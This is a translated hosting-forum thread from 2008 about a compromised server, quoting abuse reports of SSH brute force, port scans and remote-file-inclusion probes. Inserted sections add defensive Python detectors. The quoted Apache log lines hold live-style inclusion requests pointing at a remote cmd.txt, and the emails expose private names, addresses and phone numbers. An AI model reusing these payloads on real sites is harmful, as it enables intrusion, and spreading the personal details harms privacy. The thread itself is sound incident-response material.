Friends, as I mentioned before, there are attacks going out from my server; here are the mails and logs that came in. Thanks to everyone for their help. Our server IP: 89.149.254.31

Code:
Kind regards / Best regards
Thomas Turnwald
Please always include the e-mail history! / Please resend the eMail-history!
netdirekt e. K.
Kleyerstrasse 79 / Tor 13
60326 Frankfurt am Main
Germany
Phone: +49 69 9055688-0
Fax: +49 69 9055688-22
Register number: HRA 30056, Court: Amtsgericht Frankfurt/Main
Owner: Wiethold Wagner

----- Original Message -----
From: "Helmut Hullen" <Hullen@t-online.de>
To: <info@netdirekt.de>
Sent: Tuesday, March 11, 2008 10:37 PM
Subject: strange requests

> Dear Sir or Madam,
>
> in the log files of a website I maintain I found, among other things:
>
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:19:55:15 +0100] "GET //include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 403 351 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:19:55:15 +0100] "GET /stabil//include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 403 358 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:19:55:15 +0100] "GET /stabil/Updates//include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 403 366 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:20:03:17 +0100] "GET /doc//include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 403 355 "-" "libwww-perl/5.808"
> 89-149-254-30.internetserviceteam.com - - [08/Mar/2008:20:03:17 +0100] "GET /doc/ods-v36//include/doc/get_image.php?lang=&img=Sito in costruzione /cmd.txt? HTTP/1.1" 403 363 "-" "libwww-perl/5.808"
>
> The entries are typical of the attempts made by a malicious program.
> Could you please investigate which of your machines issued the requests and whether it is infected with malware? Thank you!
>
> Kind regards!
> Helmut Hullen
> Wendenmaschstr. 8
> 38114 Braunschweig
> Tel. 0531-34 11 26

Code:
SSH attack
NTP sync'd to GMT -5

Begin forwarded message:
> smtptoaster.midasnetworks.com login failures:
> Mar 10 01:21:24 smtptoaster sshd[69283]: Invalid user mythtv from 89.149.254.31
> Mar 10 01:21:25 smtptoaster sshd[69285]: Invalid user mythtv from 89.149.254.31
> Mar 10 01:21:27 smtptoaster sshd[69287]: Invalid user mythtv from 89.149.254.31
> Mar 10 01:21:28 smtptoaster sshd[69289]: Invalid user mythtv from 89.149.254.31
> Mar 10 01:21:30 smtptoaster sshd[69291]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:31 smtptoaster sshd[69293]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:32 smtptoaster sshd[69295]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:34 smtptoaster sshd[69297]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:35 smtptoaster sshd[69299]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:36 smtptoaster sshd[69301]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:38 smtptoaster sshd[69303]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:39 smtptoaster sshd[69305]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:41 smtptoaster sshd[69307]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:42 smtptoaster sshd[69309]: Invalid user oracle from 89.149.254.31
> Mar 10 01:21:45 smtptoaster sshd[69313]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:46 smtptoaster sshd[69315]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:47 smtptoaster sshd[69317]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:49 smtptoaster sshd[69319]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:50 smtptoaster sshd[69321]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:52 smtptoaster sshd[69323]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:53 smtptoaster sshd[69325]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:54 smtptoaster sshd[69327]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:56 smtptoaster sshd[69329]: Invalid user admin from 89.149.254.31
> Mar 10 01:21:57 smtptoaster sshd[69331]: Invalid user test from 89.149.254.31
> Mar 10 01:21:58 smtptoaster sshd[69333]: Invalid user test from 89.149.254.31
> Mar 10 01:22:00 smtptoaster sshd[69335]: Invalid user test from 89.149.254.31
> Mar 10 01:22:01 smtptoaster sshd[69350]: Invalid user test from 89.149.254.31
> Mar 10 01:22:03 smtptoaster sshd[69352]: Invalid user test from 89.149.254.31
> Mar 10 01:22:04 smtptoaster sshd[69354]: Invalid user test from 89.149.254.31
> Mar 10 01:22:05 smtptoaster sshd[69356]: Invalid user test from 89.149.254.31
> Mar 10 01:22:07 smtptoaster sshd[69358]: Invalid user test from 89.149.254.31
> Mar 10 01:22:08 smtptoaster sshd[69360]: Invalid user test from 89.149.254.31
> Mar 10 01:22:09 smtptoaster sshd[69362]: Invalid user test from 89.149.254.31
> Mar 10 01:22:11 smtptoaster sshd[69364]: Invalid user test from 89.149.254.31
> Mar 10 01:22:12 smtptoaster sshd[69366]: Invalid user test from 89.149.254.31
> Mar 10 01:22:13 smtptoaster sshd[69368]: Invalid user test from 89.149.254.31
> Mar 10 01:22:15 smtptoaster sshd[69370]: Invalid user mysql from 89.149.254.31
> Mar 10 01:22:16 smtptoaster sshd[69372]: Invalid user mysql from 89.149.254.31
> Mar 10 01:22:18 smtptoaster sshd[69374]: Invalid user mysql from 89.149.254.31
> Mar 10 01:22:19 smtptoaster sshd[69376]: Invalid user setup from 89.149.254.31
> Mar 10 01:22:20 smtptoaster sshd[69378]: Invalid user setup from 89.149.254.31
> Mar 10 01:22:22 smtptoaster sshd[69380]: Invalid user setup from 89.149.254.31
> Mar 10 01:22:23 smtptoaster sshd[69382]: Invalid user setup from 89.149.254.31
> Mar 10 01:22:24 smtptoaster sshd[69384]: Invalid user setup from 89.149.254.31
> Mar 10 01:22:26 smtptoaster sshd[69386]: Invalid user user1 from 89.149.254.31
> Mar 10 01:22:27 smtptoaster sshd[69388]: Invalid user user from 89.149.254.31
> Mar 10 01:22:29 smtptoaster sshd[69390]: Invalid user user from 89.149.254.31
> Mar 10 01:22:30 smtptoaster sshd[69392]: Invalid user user from 89.149.254.31

--
Kind regards / Best regards
Simon Roehl
netdirekt e.K.
Kleyerstrasse 79 / Tor 13
60326 Frankfurt am Main
Germany
Phone: +49 69 9055688-0
Fax: +49 69 9055688-22
Mail: technik@netdirekt.de
Register number: HRA 30056
Court: Amtsgericht Frankfurt am Main
Owner: Wiethold Wagner

Code:
-------- Original message --------
Subject: (b2911274)Network scan from 89.149.254.31 (repeat offender)
Date: Wed, 12 Mar 2008 10:49:48 +0000 (GMT)
From: secmbox3@verizonbusiness.com
Reply to: secmbox3@verizonbusiness.com
To: abuse@netdirekt.de, abuse@unix-server.com, abuse@gblx.net

You are receiving this message because you are on the contact list for 89.149.254.31. This message has been sent to abuse@netdirekt.de, abuse@unix-server.com, abuse@gblx.net. At this time, this message is for informational use only.

We detected a scan of part of the Verizon Business Public IP network which appears to have originated from the source address 89.149.254.31 (89-149-254-31.internetserviceteam.com). There have been 1 previous offenses by this IP. While dynamic addressing prevents us from being able to say whether it was the same individual each time, it could be an indication of a more serious problem. The scanning began at approximately 2008-03-11 02:27:42 UTC.

If neither you nor the owner of this address are aware of this traffic, it is possible that a third party is either forging the source address or executing an unauthorized scan from this machine. If you suspect the scan is being executed by an unauthorized third party, a trojan, or a virus, please consult http://www.cert.org/tech_tips/root_compromise.html.

This address attempted to scan approximately 1960 addresses on TCP/22. This is a violation of Verizon Business's acceptable use policy. For further information, please consult: http://global.mci.com/terms/a_u_p/. A reply to this message is not required, but the activity above must be stopped. If you need to contact us about this issue, please reply to this message leaving the ticket number in the subject line.

Thank you
Verizon Business Infrastructure/Network Security Team

Sample of log entries:
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.78:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.76:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.79:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.220:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.223:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.221:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.209:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.211:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.217:22,tcp
2008-03-11 02:27:42 UTC,Src IP 89.149.254.31:21214,Dst IP 152.63.0.208:22,tcp

Code:
-------- Original message --------
Subject: Incident ID: BRT488159 Sent to info@netdirekt.de
Date: Wed, 12 Mar 2008 08:32:14 UT
From: soc@brasiltelecom.com.br
To: info@netdirekt.de
CC: cert@cert.br

Dear Sirs,

It was detected on Brasil Telecom's monitoring systems that the machine listed in this mail has been maliciously used. The traffic details are below (Note that the date/time is in the format: YYYY-MM-DD HH:MM:SS). Please respond accordingly to this Incident. Therefore the IP 89.149.254.31 will be blocked on all our Data Centers for 60 minutes. To reply to this e-mail, please keep the ID BRT488159 in the Subject Field.

Thanks,
CSIRT Brasil Telecom

2008-03-12 08:23:57 GMT 89.149.254.31 1:2002889 SSH Brute Force Attempt

Dear responsible parties,

Brasil Telecom's security monitoring has identified that the machine listed below is being used for malicious purposes on the Internet (note that the date is in the following format: YYYY-MM-DD HH:MM:SS). Please take the appropriate actions regarding the Incident. Because of this, the IP 89.149.254.31 will be blocked for 60 minutes in all our Data Centers. When replying to this e-mail, keep the ID BRT488159 in the subject field.

Regards,
Brasil Telecom CSIRT

---
This message was sent automatically by the SOC - Security Operations Center of Brasil Telecom S.A. and may contain privileged and/or confidential information and may not be retransmitted. If further clarification or actions by the Security Incident Response team are needed, please contact the SOC by phone at +55(61)3305-5565 (24x7 service) or by e-mail at soc.nivel1@brasiltelecom.com.br.
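As an added example (not part of the thread and not from any of the reports quoted in it): a small Python script that applies two detections to log lines of the kinds shown above, namely repeated sshd "Invalid user" failures from one source address inside a short time window, and Apache requests that hand a full URL to a query parameter (the get_image.php?img=http://... probes). The sample lines are constructed from entries in the post plus benign lines; the threshold, window and assumed year are my own choices.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs

# Constructed samples modelled on entries quoted in the thread, plus one benign line
# (RFC 5737 address) in each set to show what is not flagged.
SSHD_LINES = """\
Mar 10 01:21:24 smtptoaster sshd[69283]: Invalid user mythtv from 89.149.254.31
Mar 10 01:21:30 smtptoaster sshd[69291]: Invalid user oracle from 89.149.254.31
Mar 10 01:21:45 smtptoaster sshd[69313]: Invalid user admin from 89.149.254.31
Mar 10 01:22:15 smtptoaster sshd[69370]: Invalid user mysql from 89.149.254.31
Mar 10 03:10:02 smtptoaster sshd[70001]: Invalid user bob from 192.0.2.7
""".splitlines()
APACHE_LINES = """\
89-149-254-30.internetserviceteam.com - - [08/Mar/2008:19:55:15 +0100] "GET //include/doc/get_image.php?lang=&img=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 403 351 "-" "libwww-perl/5.808"
203.0.113.5 - - [08/Mar/2008:19:56:01 +0100] "GET /gallery.php?img=logo.png HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
""".splitlines()
SSHD_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                     r"Invalid user (?P<user>\S+) from (?P<ip>\S+)$")
APACHE_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
                       r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def ssh_bruteforce_sources(lines, threshold=4, window_seconds=120, year=2008):
    # Sources with >= threshold 'Invalid user' failures inside any window_seconds span.
    # syslog timestamps carry no year, so one is assumed to make them comparable.
    events = defaultdict(list)                      # ip -> [(time, user)]
    for m in filter(None, map(SSHD_RE.match, lines)):
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        events[m["ip"]].append((ts, m["user"]))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):                 # sliding window over sorted times
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = {"attempts": end - start + 1,
                               "users": sorted({u for _, u in evs[start:end + 1]})}
    return flagged

def rfi_probes(lines):
    # Requests that pass a full URL in a query parameter: the remote-file-inclusion
    # probing pattern seen in the Apache entries above (img=http://.../cmd.txt).
    hits = []
    for line in lines:
        m = APACHE_RE.match(line)
        if not m or "?" not in m["path"]:
            continue
        for name, values in parse_qs(m["path"].split("?", 1)[1], keep_blank_values=True).items():
            if any(v.lower().startswith(("http://", "https://", "ftp://")) for v in values):
                hits.append({"host": m["host"], "param": name, "status": m["status"], "ua": m["ua"]})
    return hits
```

Both checks work on the server that is the target of the probing; on the sending server itself the equivalent evidence is the outbound traffic, which is what the later reply asks to see.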
Edit... I had misread it.
Is there anyone among the accounts you have opened who has SSH access? Could you have been hacked? It will sound strange, but they can carry out this kind of attack from PHP. Take the output of netstat -nap from your server and paste it here exactly as it is, so we can see the data being sent in and out.
__________________
Netinternet Telekom. Now you have more time! NOTE: Please use our forums for support, don't send PMs; sorry, but I can't attend to you privately, I can barely keep up with my own customers 8)
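As an added example (not the poster's, and not based on real output from the server in the thread): a Python helper that reads netstat -nap output, which the reply above asks for, and counts outbound TCP connections to port 22 per PID/program name, so a process spraying SSH connections from the server stands out. The netstat text is constructed in Linux net-tools layout; the column format and the process names are assumptions.

```python
import re
from collections import Counter

# Constructed netstat -nap output in Linux net-tools layout (an assumption; the thread
# does not include the real output). Remote addresses reuse those in the abuse reports.
NETSTAT_OUTPUT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1201/httpd
tcp        0      1 89.149.254.31:21214     152.63.0.78:22          SYN_SENT    4432/perl
tcp        0      1 89.149.254.31:21214     152.63.0.76:22          SYN_SENT    4432/perl
tcp        0      0 89.149.254.31:38811     152.63.0.220:22         ESTABLISHED 4432/perl
tcp        0      0 89.149.254.31:80        203.0.113.9:51000       ESTABLISHED 1202/httpd
udp        0      0 0.0.0.0:123             0.0.0.0:*                           900/ntpd
"""

# One TCP row; rows whose PID/Program column is "-" (netstat run without root) do not match.
ROW_RE = re.compile(r"^(?P<proto>tcp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<remote>\S+)"
                    r"\s+(?P<state>\S+)\s+(?P<pid>\d+)/(?P<prog>\S+)$")

def outbound_by_process(output, remote_port=22):
    # Count non-listening TCP sockets per PID/program whose remote end is remote_port.
    counts = Counter()
    for line in output.splitlines():
        m = ROW_RE.match(line)
        if not m or m["state"] == "LISTEN":
            continue
        if m["remote"].rsplit(":", 1)[1] == str(remote_port):
            counts[f"{m['pid']}/{m['prog']}"] += 1
    return dict(counts)
```

A web-server child or a perl process with many half-open connections to port 22 on unrelated hosts is the outbound counterpart of the scan Verizon reported, and the PID gives the process to inspect.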
This ends in an OS reload, my friend..
__________________
WHMSONIC TURKEY AUTHORIZED REPRESENTATIVE. WEB PROGRAMMERS AND DESIGNERS WANTED!
>> PLEASE DO NOT ADD OUR MSN ADDRESSES TO REQUEST FREE SUPPORT. USE OUR FORUMS FOR ALL FREE SUPPORT. THANK YOU <<